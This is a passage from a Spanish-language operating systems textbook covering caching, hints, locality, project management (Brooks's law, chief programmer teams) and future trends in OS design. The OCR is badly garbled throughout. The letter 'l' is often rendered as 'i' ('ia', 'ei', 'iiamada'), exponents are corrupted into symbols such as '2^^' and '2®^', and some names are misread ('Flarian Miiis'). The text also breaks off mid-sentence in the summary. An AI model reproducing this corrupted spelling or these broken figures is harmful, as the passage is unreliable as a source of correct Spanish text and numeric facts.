U n probiema que surge ai coi ocar ias rutas en caché es que ia asignación entre ei nombre de un 
archivo y su número de nodo-i no es fija todo ei tiempo. Suponga que ei archivo /usr/ast/mbox se 
eiimina dei sistema y su nodo-i se reutiiiza para un distinto archivo que pertenece a un usuario di¬ 
ferente. M ás tarde se vueive a crear ei archivo /usr/ast/mbox pero esta vez obtiene ei nodo-i 106. Si 
no se hace nada por evitado, ia entrada en ia caché será incorrecta y ias búsquedas posteriores de- 
voiverán ei número de nodo-i incorrecto. Por esta razón, cuando se eiimina un archivo o directorio, 
se deben purgar su entrada en ia caché y (si es un directorio) todas ias entradas de ios niveies infe¬ 
riores. 

Los bioques de disco y ios nombres de ruta no son ios únicos ei ementas que se pueden coio- 
car en caché. Los nodos-i también se pueden poner en caché. Si se utiiizan hiios emergentes para 
manejar interrupciones, cada uno de eiios requiere una piia y cierta maquinaria adicionai. Estos hi¬ 
ios que se han utiiizado antes se pueden poner también en ia caché, ya que es más fácii refabricar 
un hiio usado que crear uno nuevo desde cero (para evitar tener que asignar memoria). Casi cuai- 
quier cosa que sea difícii de producir se puede poner en ia caché. 


13.4.5 Sugerencias 

Las entradas en i a caché siempre son correctas. Una búsqueda en i a caché puede fracasar, pero si 
encuentra una entrada, se garantiza que es correcta y se puede utiiizar sin más. En aigunos siste¬ 
mas es conveniente tener una tabia de sugerencias. Éstas son sugerencias sobre i a soiución, pe¬ 
ro no se garantiza que sean correctas. Ei que hace ia iiamada debe verificar ei resuitado por su 
cuenta. 
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Un ejemplo muy conocido de sugerencias son ios URLs incrustados en ias páginas Web. Ai ha¬ 
cer ciic en un víncuio no se garantiza que ia página Web a ia que apunta esté ahí. De hecho, ia pá¬ 
gina a ia que apunta se puede haber eiiminado 10 años atrás. Por ende, ia información en ia página 
a ia que apunta es en reaiidad sóio una sugerencia. 

Las sugerencias también se utiiizan en conexión con ios archivos remotos. La información en 
ia sugerencia indica aigo acerca dei archivo remoto, como su ubicación por ejempio. Sin embargo, 
ei archivo tai vez se haya movido o eiiminado desde que se registró ia ocurrencia, por io que siem¬ 
pre es necesario reaiizar una comprobación para ver si es correcta. 

13.4.6 Explotar la localidad 

Los procesos y ios programas no actúan ai azar. Exhiben una cantidad considerabiede iocaiidad en 
tiempo y espacio, y esta información se puede expiotar de varias formas para mejorar ei rendimien¬ 
to. U n ejempio muy conocido de iocaiidad espaciai es ei hecho de que ios procesos no saitan ai azar 
dentro de sus espacios de direcciones. Tienden a utiiizar un número reiativamente pequeño de pá¬ 
ginas durante un i ntervaio dado. L as pági ñas que un proceso uti i iza de manera activa se pueden con¬ 
siderar como su conjunto de trabajo, y ei sistema operativo puede asegurar que cuando se permita 
i a ejecución dei proceso, su conjunto de trabajo esté en i a memoria para reducir ei número defaiios 
de página. 

Ei principio de iocaiidad también seapiica a ios archivos. Cuando un proceso seiecciona un di¬ 
rectorio de trabajo específico, es probabie que muchas de sus futuras referencias sean a archivos en 
ese directorio. Ai coiocar todos ios nodos-i y archivos para cada directorio cerca unos de otros 
en ei disco, se pueden obtener mejoras en ei rendimiento. Ei Sistema de archivos rápidos de Berke- 
iey se basa en este principio (M cKusick y coiaboradores, 1984). 

Otra área en ia que ia iocaiidad es importante es en ia pianificación de hiios en ios muitiproce¬ 
sadores. Como vimos en ei capítuio 8, una forma de pianificar hiios en un muitiprocesador es tra¬ 
tar de ejecutar cada hiio en iaCPU que uti i izó ia úitima vez, con ia esperanza dequeaigunosdesus 
bioques de memoria aún se encuentren en ia caché de memoria. 

13.4.7 Optimizar el caso común 

Con frecuencia es conveniente distinguir entre ei caso más común y ei peor caso posibie, y tratados 
de manera distinta. A menudo ei código para ambos es bastante diferente. Es importante que ei caso 
común sea rápido. Para ei peor caso, si ocurre con poca frecuencia es suficiente con hacerio correcto. 

Como primer ejempio, considere ei caso en que un proceso entra a una región crítica. La ma¬ 
yor parte dei tiempo ia entrada tendrá éxito, en especiai si ios procesos no pasan mucho tiempo den¬ 
tro de ias regiones críticas. Windows Vita aprovecha esta expectativa ai proveer una iiamada 
EnterCriticaisection en ia API Win32, la cual realiza una evaluación atómica de una bandera en 
modo de usuario (mediante el uso de tsl o su equivalente). Si la evaluación tiene éxito, el proceso 
entra a la región crítica y no se requiere una llamada al kernel. Si la evaluación fracasa, el proceso de 
biblioteca realiza una llamada a down en un semáforo para bloquear el proceso. Así, en el caso nor¬ 
mal no se requiere una llamada al kernel. 
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Como segundo ejemplo, considere el establecimiento de una alarma (mediante el uso de seña¬ 
les en UNIX). Si no hay una alarma pendiente en un momento dado, basta con crear una entrada 
y ponerla en la cola del temporizador. No obstante, si ya hay una alarma pendiente, se tiene que 
encontrar y eliminar de la cola del temporizador. Como la llamada a aiarm no especifica si ya hay 
un conjunto de alarmas, el sistema tiene que asumir el peor caso: que sí lo hay. Sin embargo, como 
la mayor parte del tiempo no hay una alarma pendiente, y como se requieren muchos recursos para 
eliminar una alarma existente, es conveniente diferenciar estos dos casos. 

Una forma de hacer esto es mantener un bit en la tabla de procesos que indique si hay una alarma 
pendiente. Si el bit está desactivado, se sigue la ruta fácil (sólo agregar una nueva entrada en la cola del 
temporizador sin comprobar). Si el bit está activado, se debe comprobar la cola del temporizador. 


13.5 ADMINISTRACIÓN DE PROYECTOS 

Los programadores son optimistas perpetuos. La mayoría de ellos piensan que la forma de escribir 
un programa es correr al teclado y empezar a escribir. Poco después se termina el programa com¬ 
pletamente depurado. En programas muy extensos esto no funciona así. En las siguientes secciones 
hablaremos sobre la administración de proyectos extensos de hardware, en especial los proyectos 
de sistemas operativos extensos. 

13.5.1 El mítico hombre-mes 

En su clásico libro, Fred Brooks, uno de los diseñadores del OS/360 y que más adelante se dedicó 
a la vida académica, aborda la pregunta de por qué es tan difícil construir sistemas operativos gran¬ 
des (Brooks, 1975, 1995). Cuando la mayoría de los programadores ven su afirmación de que un 
programador puede producir sólo 1000 líneas de código depurado al año en proyectos extensos, se 
preguntan si el profesor Brooks vive en el espacio exterior, tal vez en el Planeta Error. Después de 
todo, la mayoría de ellos pueden recordar una ocasión en que trabajaron hasta la madrugada y pro¬ 
dujeron un programa de 1000 líneas en una sola noche. ¿Cómo podría ser ésta la producción anual 
de una persona con un IQ > 50? 

Lo que Brooks señaló es que los proyectos grandes, con cientos de programadores, son por 
completo distintos de los proyectos pequeños, y los resultados que se obtienen de los proyectos pe¬ 
queños no se pueden extrapolar a la escala de los extensos. En un proyecto extenso, se consume 
gran cantidad de tiempo en planear cómo dividir el trabajo en módulos, especificando con cuidado 
los módulos y sus interfaces, y tratando de imaginar cómo interactuarán los módulos, incluso antes 
de empezar la codificación. Después los módulos se tienen que codificar y depurar en forma aisla¬ 
da. Por último, hay que integrarlos y el sistema se tiene que probar como un todo. El caso normal 
es que cada módulo funciona sin problemas cuando se evalúa por sí solo, pero el sistema falla al 
instante cuando se reúnen todas las piezas. Brooks estimó que el trabajo se compone de 

1/3 Planificación 
1/6 Codificación 
1/4 Prueba de módulos 
1/4 Prueba del sistema 
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En otras palabras, la escritura del código es la parte sencilla. La parte difícil es averiguar cuáles de¬ 
ben ser los módulos y lograr que el módulo A se comunique en forma correcta con el módulo B. En 
un pequeño programa escrito por un solo programador, todo lo que queda es la parte sencilla. 

El título del libro de B rooks proviene de su aseveración de que las personas y el tiempo no son 
intercambiables. No hay una unidad tal como hombre-mes (o persona-mes). Si 15 personas tardan 
2 años en crear un proyecto, es inconcebible que 360 personas lo puedan hacer en un mes y tal vez 
tampoco sea posible que 60 personas lo hagan en 6 meses. 

Hay tres razones relacionadas con este efecto. En primer lugar, el trabajo no se puede paraleli- 
zar por completo. La codificación no puede empezar sino hasta que se haya realizado la planeación 
y se haya determinado qué módulos se necesitan y cuáles serán sus interfaces. En un proyecto de 
dos años, la planificación por sí sola podría requerir 8 meses. 

En segundo lugar, para aprovechar por completo un gran número de programadores, el trabajo 
se debe particionar en un gran número de módulos, de manera que todos tengan algo que hacer. Co¬ 
mo existe la posibilidad de que cada módulo interactúe con todos los demás módulos, el número de 
interacciones de módulo a módulo que es necesario considerar aumenta con base en el cuadrado del 
número de módulos: es decir, con base en el cuadrado del número de programadores. Esta comple¬ 
jidad se sale rápidamente de control. Las mediciones cuidadosas de 63 proyectos de software han 
confirmado que el balance entre personas y meses dista mucho de ser lineal en los proyectos exten¬ 
sos (Boehm, 1981). 

En tercer lugar, la depuración es muy secuencial. Utilizar 10 depuradores en un problema no 
significa que el error se va a encontrar 10 veces más rápido. De hecho, es probable que diez depu¬ 
radores sean más lentos que uno, ya que desperdiciarán mucho tiempo hablando entre sí. 

Brooks resume su experiencia con el balance entre personas y tiempo en la Ley de Brooks: 

Si se agrega personal a un proyecto de software retrasado, se atrasará más. 

El problema de agregar personas es que se tienen que capacitar en el proyecto, los módulos se tie¬ 
nen que volver a dividir para coincidir con el mayor número de programadores disponibles, se re¬ 
querirán muchas reuniones para coordinar todos los esfuerzos, etc. Abdel-Hamid y M adnick (1991) 
confirmaron esta ley en forma experimental. Una forma un tanto irreverente de reformular la ley de 
Brooks es: 

Se necesitan 9 meses para tener un hijo, sin importar cuántas mujeres se asignen a esa tarea. 


13.5.2 E structura de equipos 

Los sistemas operativos comerciales son proyectos de software extensos y siempre requieren gran¬ 
des equi pos de personas. L a capad dad de I as personas es i nmensamente i mportante. D esde hace dé¬ 
cadas se sabe que los mejores programadores son 10 veces más productivos que los malos 
programadores (Sackman y colaboradores, 1968). El problema es que, cuando se necesitan 200 pro¬ 
gramadores, es difícil encontrar 200 buenos programadores: hay que conformarse por un amplio es¬ 
pectro de cualidades. 
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Lo que también es importante en cuaiquier proyecto de diseño extenso, ya sea de software o de 
otra índoie, es ia necesidad de coherencia arquitectónica. Debe haber una mente que controie ei di¬ 
seño. Brooks cita a ia catedrai de Rheims en Francia como un ejempio de un proyecto extenso que 
tardó décadas en construirse, y en ei cuai ios arquitectos que iiegaron después subordinaron su de¬ 
seo de poner su seiio en ei proyecto, para iievar a cabo ios pianes dei arquitecto iniciai. Ei resuita- 
do es una coherencia arquitectónica sin precedentes en otras catedraies europeas. 

En ia década de 1970, Flarian M iiis combinó ia observación deque aigunos programadores son 
mucho mejores que otros con ia necesidad de coherencia arquitectónica, para proponer ei paradig¬ 
ma dei equipo del programador en jefe (Baker, 1972). Su idea era organizar un equipo de progra¬ 
mación como un equipo de cirujanos, y no de carniceros. En vez de que todos tiren machetazos a 
diestra y siniestra, una persona esgrime ei bisturí. Todos ios demás están ahí para ofrecer su ayuda. 
Para un proyecto de 10 personas, M iiis sugirió ia estructura de equipo de ia figura 13-10. 


Título 

Deberes 

Programador en jefe 

Reaiiza ei diseño arquitectónico y escribe ei código 

Copiioto 

Ayuda al programador en jefe y sirve como caja de resonancia 

Administrador 

Administra las personas, el presupuesto, espacio, equipo, informes, 

etcétera 

Editor 

Edita la documentación, que el programador en jefe debe escribir 

Secretarias 

El administrador y el editor necesitan una secretaria cada uno 

Empieado de programas 

Mantiene los archivos de código y de documentación 

Jefe de herramientas 

Provee todas las herramientas que necesita el programador en jefe 

Evaiuador 

Evalúa el código del programador en jefe 

Abogado de ienguaje 

Empleado de medio tiempo que puede aconsejar al programador en 
jefe en relación con el lenguaje 


Figura 13-10. Proposición de M ill para llenar el equipo de 10 personas del programador 
en jefe. 


Flan transcurrido tres décadas desde que se propuso este equipo y se puso en producción. Ai- 
gunas cosas han cambiado (como ia necesidad de un abogado de ienguaje; C es más simpie que 
PL/I), pero ia necesidad de tener sóio una mente que controie ei diseño sigue en pie. Y una men¬ 
te debe ser capaz de trabajar 100% en ei diseño y ia programación, de ahí que se necesite ei per- 
sonai de soporte, aunque ahora con ia ayuda de ia computadora es suficiente con un personai más 
pequeño. Pero en esencia, esta idea sigue siendo váiida. 

Cuaiquier proyecto extenso necesita organizarse como una jerarquía. En ei nivei inferior hay 
muchos equipos pequeños, cada uno de ios cuai es está encabezado por un programador en jefe. En 
ei siguiente nivei, ios grupos de equipos se deben coordinar mediante un administrador. La expe¬ 
riencia muestra que cada persona que administramos nos cuesta 10% de nuestro tiempo, por io que 
se requiere un administrador de tiempo compieto para cada grupo de 10 equipos. También hay 
que administrar a estos administradores, y así en io sucesivo. 

B rooks observó que ias maias noticias no suben muy bien por ei árboi. j erry Saitzer dei M .1 .T. 
iiamó a esto ei efecto dei diodo de las malas noticias. Ningún programador en jefe o su adminis- 
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trador desea decir a su jefe que el proyecto está retrasado 4 meses y que no hay ninguna probabili¬ 
dad de cumplir con el tiempo de entrega, debido a que hay una tradición de 2000 años de antigüedad 
de decapitar al mensajero que lleva malas noticias. Como consecuencia, la administración superior 
por lo general está a oscuras en relación con el estado del proyecto. Cuando se vuelve obvio que no 
se puede cumplir con el tiempo de entrega, la administración superior responde agregando perso¬ 
nal, y en ese momento entra en acción la Ley de Brooks. 

En la práctica, las empresas grandes que han tenido mucha experiencia en la producción de 
software y saben lo que ocurre si se produce al azar, tienen la tendencia de por lo menos tratar 
de hacerlo bien. En contraste, las empresas más pequeñas y recientes, que tienen mucha prisa por 
entrar al mercado, no siempre tienen cuidado en producir su software con cuidado. Este apuro a me¬ 
nudo produce resultados muy alejados de lo óptimo. 

Ni Brooks ni Mills pronosticaron el crecimiento del movimiento del código fuente abierto. 
A unque ha tenido algunos éxitos, todavía no se sabe si éste es un modelo viable para producir gran¬ 
des cantidades de software de calidad, una vez que se pase la novedad. Hay que recordar que en sus 
primeros días, la radio era dominada por los radio-aficionados, pero poco después apareció la radio 
comercial y después la televisión comercial. Lo perceptible es que los proyectos de software de có¬ 
digo fuente abierto que han tenido más éxito son los que han utilizado claramente el modelo del 
programador en jefe, en el que una sola mente controla el diseño arquitectónico (por ejemplo, Li- 
nusTorvalds para el kernel de Linux y Richard Stallman para el compilador GNU C). 


13.5.3 La función de la experiencia 

Es i mpresci ndi ble tener diseñadores experimentados para un proyecto de sistemas operativos. B rooks 
señala que la mayoría de los errores no están en el código, sino en el diseño. Los programadores hi¬ 
cieron de manera correcta lo que se les indicó: era erróneo lo que se les dijo que hicieran. Ninguna 
cantidad de software de prueba puede atrapar las especificaciones defectuosas. 

La solución de Brooks es abandonar el modelo de desarrollo clásico de la figura 13-ll(a) y uti¬ 
lizar el modelo de la figura 13-ll(b). Aquí la idea es primero escribir un programa principal que 
simplemente llame a los procedimientos de nivel superior, que en un principio son señuelos. Des¬ 
de el primer día del proyecto, el sistema se podrá compilar y ejecutar, aunque no hará nada. A me¬ 
dida que transcurra el tiempo, se insertarán los módulos en el sistema completo. El resultado de este 
método esquela prueba de integración del sistema se realiza en forma continua, por lo que los erro¬ 
res en el diseño aparecen mucho antes. En efecto, el proceso de aprendizaje producido por las ma¬ 
las decisiones de diseño empieza mucho antes en el ciclo. 

Tener poco conocimiento es algo peligroso. Brooks observó lo que denominó el efecto del se¬ 
gundo sistema. A menudo, el primer producto producido por un equipo de diseño es mínimo, de¬ 
bido a que los diseñadores tienen miedo de que no vaya a funcionar. Como resultado, se rehúsan a 
poner muchas características. Si el proyecto tiene éxito, crean un segundo sistema. Impresionados 
por su propio éxito, la segunda vez los diseñadores incluyen todos los adornos que omitieron de ma¬ 
nera intencional la primera vez. Como resultado, el segundo sistema está atestado de características 
y tiene un rendimiento pobre. La tercera vez se percatan del fracaso del segundo sistema y vuelven 
a ser precavidos. 
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Figura 13-11. (a) El diseño de software tradicional progresa en etapas, (b) El diseño 
alternativo produce un sistema funcional (que no hace nada) desde el día 1. 


El par CTSS-M ULTICS es un caso claro en cuestión. CTSS fue el primer sistema de tiempo 
compartido con un propósito general, y fue un enorme éxito a pesar de tener una funcionalidad mí¬ 
nima. Su sucesor M ULTICS fue demasiado ambicioso y sufrió de manera considerable por ello. Las 
ideas eran buenas, pero había demasiadas novedades, por lo que el sistema tuvo un desempeño po¬ 
bre durante años y nunca fue un éxito comercial. El tercer sistema en esta línea de desarrollo 
(U NIX) fue mucho más precavido y mucho más exitoso. 

13.5.4 Sin bala de plata 

Además de su obra El mítico hombre-mes, Brooks también escribió un artículo influyente llamado 
"Sin bala de plata" (Brooks, 1987). En él afirmaba que ninguno de los muchos remedios por los que 
pregonaban varias personas en ese tiempo iba a generar una mejora considerable en la productivi¬ 
dad del software en una década. La experiencia demuestra que él tenía razón. 

Entre las balas de plata que se propusieron estaban los lenguajes de alto nivel mejorados, la 
programación orientada a objetos, la inteligencia artificial, los sistemas expertos, la programación 
automática, la programación gráfica, la verificación de los programas y los entornos de programa¬ 
ción. Tal vez en la siguiente década veremos una bala de plata, pero tal vez tengamos que confor¬ 
marnos con mejoras graduales e increméntales. 


13.6 TENDENCIAS EN EL DISEÑO 
DE SISTEMAS OPERATIVOS 

Hacer predicciones siempre es difícil; en especial sobre el futuro. Por ejemplo, en 1899 el jefe de 
la Oficina de Patentes de los EE.UU., Charles H. Duell, pidió al entonces presidente M cKinley que 
aboliera la Oficina de Patentes (¡y su trabajo!), debido a que, según sus propias palabras: "Todo lo 
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que se pueda inventar ya ha sido inventado" (Cerf y Navasky, 1984). Sin embargo, Thomas Edison 
apareció ai pie de su puerta pocos años después con un par de inventos nuevos, entre eiios ia iuz 
eiéctrica, ei fonógrafo y ei proyector de peiícuias. Vamos a poner nuevas baterías en nuestra boia 
de cristai y aventurarnos a adivinar hacia dónde van ios sistemas operativos en ei futuro cercano. 

13.6.1 Virtualización 

La virtuaiización es una idea cuyo tiempo ha iiegado... otra vez. Primero surgió en 1967 con ei sis¬ 
tema IBM CP/CMS, pero ahora está de vuelta con toda su fuerza en la plataforma Pentium. En el 
futuro cercano, muchas computadoras ejecutarán hipervisores en el hardware directo, como se 
muestra en la figura 13-12. El hipervisor creará varias máquinas virtuales, cada una con su propio 
sistema operativo. Algunas computadoras ejecutarán Windows en una máquina virtual para las apli¬ 
caciones heredadas, varias máquinas virtuales con Linux para las aplicaciones actuales, y tal vez 
uno o más sistemas operativos experimentales en otras máquinas virtuales. Este fenómeno se des¬ 
cribió en el capítulo 8, y sin duda es la ola del futuro. 


Máquina virtual ^ 

Windows 

Linux 

Linux 

Otro 

SO 


Hipervisor 


Hardware 


Figura 13-12. U n hipervisor que ejecuta cuatro máquinas virtuales. 


13.6.2 Chipsmultinúcleo 

Los chips multinúcleo ya están aquí, pero los sistemas operativos para ellos no los aprovechan bien, 
ni siquiera con dos núcleos y mucho menos con 64, que no tardan mucho en llegar. ¿Qué harán to¬ 
dos los núcleos? ¿Qué tipo de software se necesitará para ellos? En realidad todavía no se sabe. Al 
principio, las personas tratarán de parchar los sistemas operativos actuales para trabajar en ellos, pe¬ 
ro es muy poco probable que esto vaya a tener éxito con grandes números de núcleos, debido al pro¬ 
blema de bloquear las tablas y demás recursos de software. Sin duda hay espacio aquí para ideas 
radicalmente nuevas. 

La combinación de la virtualización y los chips multinúcleo crea todo un nuevo entorno. En es¬ 
te mundo, el número deCPUs disponibles es programable. Con un chip de ocho núcleos, el softwa¬ 
re podría hacer cualquier cosa, desde sólo utilizar una CPU e ignorar a las otras siete, hasta utilizar 
las ocho CPUs reales, la virtualización de dos vías, con lo cual se obtienen 16 CPUs virtuales, o la 
virtualización de cuatro vías con 32 CPUs virtuales, o casi cualquier otra combinación. Un progra¬ 
ma podría empezar por anunciar cuántas CPUs desea y el sistema operativo es quien decide si se 
las otorga o no. 
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13.6.3 Sistemas operativos con espacios de direcciones extensos 

A medida que las máquinas pasan de los espacios de direcciones de 32 bits a los de 64 bits, se 
genera la posibilidad de realizar cambios importantes en el diseño de los sistemas operativos. Un 
espacio de direcciones de 32 bits en realidad no es tan grande. Si tratara de dividir 2^^ bytes pa¬ 
ra dar a cada habitante en la Tierra su propio byte, no habría suficientes bytes para todos. Por el 
contrario, 2®^ equivale aproximadamente a 2 x 10^®. Ahora todos podrán obtener su propio tro¬ 
zo de 3 GB. 

¿Qué podríamos hacer con un espacio de direcciones de 2 x 10^“ bytes? Para empezar, 
podríamos eliminar el concepto del sistema de archivos. En vez de ello, todos los archivos po¬ 
drían contenerse de manera conceptual en la memoria (virtual) todo el tiempo. Después de 
todo, hay suficiente espacio como para mil millones de películas completas, cada una compri¬ 
mida a 4 GB. 

Otro de los posibles usos es un almacén de objetos persistente. Se podrían crear objetos en el 
espacio de direcciones y mantenerlos ahí hasta que desparecieran todas las referencias a ellos, para 
eliminarlos posteriormente. Dichos objetos serían persistentes en el espacio de direcciones, aunque 
la computadora se apague y se reinicie. Con un espacio de direcciones de 64 bits se podrían crear 
objetos a razón de 100 M B/seg durante 5000 años, antes de que se agotara el espacio de direccio¬ 
nes. Desde luego que para poder almacenar realmente esta cantidad de datos, se requeriría una gran 
cantidad de almacenamiento en disco para el tráfico de paginación, pero por primera vez en la his¬ 
toria, el factor limitante sería el almacenamiento en disco y no el espacio de direcciones. 

Con grandes cantidades de objetos en el espacio de direcciones es interesante permitir que va¬ 
rios procesos se ejecuten en el mismo espacio de direcciones y al mismo tiempo, para compartir los 
objetos de una forma general. Dicho diseño sin duda conllevaría a sistemas operativos muy distin¬ 
tos de los que ahora tenemos. La obra (Chase y colaboradores, 1994) contiene algunas ideas sobre 
este concepto. 

Otra cuestión sobre los sistemas operativos que se tendrá que volver a considerar con las direc¬ 
ciones de 64 bits es la memoria virtual. Con 2®^ bytes de espacio de direcciones virtuales y páginas 
de8 KB tenemos 2^^ páginas. Las tablas de páginas convencionales no escalan bien a este tamaño, 
por lo que se requiere algo más. Las tablas de páginas invertidas son una posibilidad, pero también 
se han propuesto otras ideas (Talluri y colaboradores, 1995). En cualquier caso, hay mucho espacio 
para realizar nuevas investigaciones sobre los sistemas operativos de 64 bits. 


13.6.4 Redes 

Los sistemas operativos actuales se diseñaron para computadoras independientes. Las redes surgie¬ 
ron después, y por lo general el acceso es a través de programas especiales, como los navegadores 
Web, FTP o teinet. En el futuro es probable que las redes sean la base para todos los sistemas ope¬ 
rativos. Una computadora independiente sin una conexión de red será algo tan raro como un telé¬ 
fono sin conexión a la red telefónica. Y es probable que las conexiones de multimegabits/segundo 
sean la norma. 
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Los sistemas operativos tendrán que cambiar para adaptarse a este cambio en ei paradigma. La 
diferencia entre ios datos iocaies y ios datos remotos puede difuminarse hasta ei punto en que casi 
nadie se preocupe por saber en dónde se aimacenan ios datos. Tai vez ias computadoras en cuai- 
quier parte podrán tratar a ios datos de cuaiquier parte como si fueran datos iocaies. En cierto gra¬ 
do, esto ya es verdad con NFS, pero probabiemente se vueiva más dominante y mejor integrado. 

Ei acceso a Web, que en ia actuaiidad requiere programas especiaies (navegadores), tai vez se 
integre también por compieto en ei sistema operativo de un manera uniforme. Tai vez ias páginas 
Web iieguen a ser ia forma estándar de aimacenar ia información, y estas páginas pueden contener 
una ampiia variedad de ei ementes que no sean de texto, entre eiios audio, video, programas y de¬ 
más, todo io cuai se administrará como ios datos fundamentaies dei sistema operativo. 

13.6.5 Sistemas paralelos y distribuidos 

otra área prometedora es ia de ios sistemas paraieios y distribuidos. Los sistemas operativos actua- 
ies para ios muitiprocesadores y ias muiticomputadoras son sóio sistemas operativos de uniproce- 
sador estándar con pequeños ajustes en ei pianificador, para manejar un poco mejor ei paraieiismo. 
En ei futuro tai vez veamos sistemas operativos en donde ei paraieiismo sea mucho más centrai de 
io que ahora es. Este efecto se estimuiará de manera considerabiesi ias máquinas de escritorio iie- 
gan a tener pronto dos, cuatro o más CPUs en una configuración de muiti procesador. Esto puede 
ocasionar que se diseñen muchos programas de apiicaciones para ios muiti procesadores, con ia con¬ 
currente demanda de un mejor soporte dei sistema operativo para eiios. 

Es probabie que ias muiticomputadoras dominen en ei área de ias supercomputadoras científi¬ 
cas y de ingeniería de gran escaia en ios próximos años, pero ios sistemas operativos para eiias son 
aún bastante primitivos. La coiocación de procesos, ei baianceo de cargas y ia comunicación nece¬ 
sitan mucho trabajo. 

Los sistemas distribuidos actuaies se crean a menudo como middieware, debido a que ios siste¬ 
mas operativos existentes no proveen ias herramientas correctas para ias apiicaciones distribuidas. Los 
sistemas operativos futuros tai vez se diseñen con ios sistemas distribuidos en mente, de manera que 
todas ias características necesarias ya estén presentes en ei sistema operativo desde un principio. 

13.6.6 Multimedia 

Sin duda, ios sistemas muiti media tienen mucho futuro en ei mundo de ias computadoras. No sería 
sorpresa si ias computadoras, ios estéreos, ias teievisiones y ios teiéfonos se fusionaran en un soio 
dispositivo capaz de producir y admitir imágenes fijas de alta caiidad, audio y video, y se conecta¬ 
ran a redes de aita veiocidad para poder descargar, intercambiar y acceder en forma remota a estos 
archivos con faciiidad. Los sistemas operativos para estos dispositivos, o inciuso para ios disposi¬ 
tivos independientes de audio y video, tendrán que ser muy distintos a ios actuaies. En especiai se 
requerirán garantías en tiempo reai, y éstas son ias que controiarán ei diseño dei sistema. Además, 
ios consumidores no toierarán mucho ias faiias semanaies de sus teievisores digitaies, por io que se 
requerirá un software de mejor caiidad y con más toierancia a faiias. Además, ios archivos muiti- 
media tienden a ser muy extensos, por io que habrá que modificar ios sistemas de archivos para po¬ 
der manejados con eficiencia. 
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13.6.7 C omputadoras operadas por baterías 

Sin duda las poderosas PCs de escritorio, probablemente con espacios de direcciones de 64 bits, redes 
de alto ancho de banda, múltiples procesadores, y el videoy audiodealta calidad, serán comunes muy 
pronto. Sus sistemas operativos tendrán que ser muy distintos de los actuales para manejar todas es¬ 
tas demandas. Sin embargo, un segmento del mercado que crece con mayor rapidez incluso es el de 
las computadoras operadas por baterías, entre ellas las notebooks, paimtops, webpads, las laptops de 
$100 y los teléfonos inteligentes. A Igunas de estas computadoras tendrán conexiones inalámbricas al 
mundo exterior; otras se ejecutarán en modo desconectado cuando no estén acopladas en el hogar. N e- 
cesitarán distintos sistemas operativos que sean más pequeños, rápidos, flexibles y confiables que los 
actuales. Tal vez varios tipos de microkerneis y sistemas extensibles pueden formar la base. 

Estos sistemas operativos tendrán que manejar las operaciones con conexión completa (por 
ejemplo, alámbrica), con conexión débil (es decir, inalámbrica) y desconectada, incluyendo el aca¬ 
paramiento de datos antes de desconectarse y la resolución de consistencia al volver a conectarse, 
de una mejor manera que los sistemas actuales. También tendrán que manejar los problemas de mo¬ 
vilidad mejor que los sistemas actuales (por ejemplo, buscar una impresora láser, conectarse a ella 
y enviarle un archivo por radio). La administración de energía, incluyendo los diálogos extensos en¬ 
tre el sistema operativo y las aplicaciones sobre cuánta energía le queda a la batería y cómo se pue¬ 
de utilizar mejor, será algo esencial. La adaptación dinámica de las aplicaciones para manejar las 
limitaciones de las pequeñas pantallas puede llegar a ser importante. Por último, los nuevos modos 
de entrada y salida (incluyendo la escritura manual y la voz) pueden requerir nuevas técnicas en 
el sistema operativo para mejorar la calidad. Es improbable que el sistema operativo para una 
computadora inalámbrica de bolsillo, operada por voz y energizada con baterías, tenga mucho 
en común con el sistema operativo de un multiprocesador de escritorio de 64 bits con cuatro 
CPUs, con una conexión de red de fibraóptica de gigabits. Y desde luego, habrá innumerables 
máquinas híbridas con sus propios requerimientos. 

13.6.8 Sistemas embebidos 

Los sistemas embebidos son una última área en la que proliferarán los nuevos sistema operati¬ 
vos. Los sistemas operativos dentro de las lavadoras, hornos de microondas, muñecas, radios de 
transistores (¿Internet?), reproductores de M P3, cámaras de video, elevadores y pacificadores serán 
distintos de todo lo que hemos visto antes, y es muy probable que también sean distintos unos de 
otros. Tal vez cada uno esté ajustado a su aplicación específica, ya que es improbable que alguien 
inserte una tarjeta PCI en un pacificador para convertirlo en el controlador de un elevador. Como 
todos los sistemas embebidos (incrustados) sólo ejecutan un número limitado de programas, que se 
conocen en tiempo de compilación, puede ser posible realizar optimizaciones que no sean posibles 
en sistemas de propósito general. 

Una idea prometedora para los sistemas embebidos es el sistema operativo extensible (por 
ejemplo, Paramecium y Exokernel). Estos sistemas se pueden crear tan ligeros o pesados como lo 
demande la aplicación en cuestión, pero de una manera consistente a través de las aplicaciones. Co¬ 
mo los sistemas embebidos se producirán por cientos de millones, éste será un importante mercado 
para los nuevos sistemas operativos. 
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13.6.9 Nodos de monitoreo 

A unque son un mercado de nicho, las redes de monitoreo se están desplegando en muchos contex¬ 
tos, desde el monitoreo de edificios y fronteras nacionales hasta la detección de incendios foresta¬ 
les, y muchos otros más. Los monitores utilizados son de bajo costo y baja energía, y requieren 
sistemas operativos en extremo simplificados y perfeccionados, un poco más que las bibliotecas en 
tiempo de ejecución. Incluso así, a medida que los nodos poderosos disminuyan su precio empeza¬ 
remos a ver sistemas operativos reales en ellos, pero desde luego que estarán optimizados para sus 
tareas y consumirán la menor cantidad de energía posible. A hora que los tiempos de vida de las ba¬ 
terías se miden en meses y los transmisores y receptores inalámbricos consumen mucha energía, es¬ 
tos sistemas se organizarán para ser más eficientes en el uso de energía que en cualquier otra cosa. 


13.7 RESUMEN 

Para empezar el diseño de un sistema operativo, hay que determinar lo que debe hacer. La interfaz 
debe ser simple, completa y eficiente. Sus paradigmas de interfaz de usuario, de ejecución y de da¬ 
tos deben ser claros. 

El sistema debe estar bien estructurado y utilizar una de varias técnicas conocidas, como la téc¬ 
nica de niveles o la de cliente-servidor. Los componentes internos deben ser ortogonales entre sí, y 
deben separar con claridad la directiva del mecanismo. Hay que considerar con detalle las cuestio¬ 
nes tales como la comparación entre las estructuras de datos estáticas y dinámicas, la nomenclatu¬ 
ra, el tiempo de vinculación y el orden de implementación de los nodos. 

El rendimiento es importante, pero las optimizaciones se deben elegir con cuidado, para no 
arruinar la estructura del sistema. Las concesiones entre espacio y tiempo, el uso de caché, las su¬ 
gerencias, la explotación de la localidad y la optimización del caso común son optimizaciones que 
vale la pena realizar con frecuencia. 

Es distinto escribir un sistema con un par de personas a producir un sistema grande con 300. 
En este último caso, la estructura del equipo y la administración de proyectos desempeñan un pa¬ 
pel crucial en el éxito o el fracaso del proyecto. 

Por último, los sistemas operativos tendrán que cambiar en los próximos años para seguir nue¬ 
